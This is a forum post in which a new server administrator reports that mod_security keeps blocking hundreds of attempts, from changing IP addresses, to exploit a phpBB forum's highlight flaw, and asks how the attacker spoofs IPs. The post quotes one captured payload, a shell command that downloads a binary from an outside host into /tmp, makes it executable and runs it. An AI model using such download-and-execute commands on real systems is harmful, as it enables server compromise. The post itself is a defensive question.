Endless hack attempt

Ok, admitedly I'm pretty new at running a server, but not new enough that I don't have myself protected. Besides other things I've got mod_security installed and I keep catching this one:

Code: 
PHP: cd /tmp; wget www.inchon.ne.kr/.dump/bash; chmod +x bash; ./bash
sent to a phpBB forum that someone has hosted on my server and trying to use the highlight exploit.

But *hundreds* of these, mostly from different IP addresses minutes apart. Is this from a single script and is he able to spoof the IP in the request to apache? I don't understand the logic -- if the request fails once, and fails twice, why would the request go through if it's tried over and over again from different IPs? How is he able to spoof the IP?

 

 

 

 

Top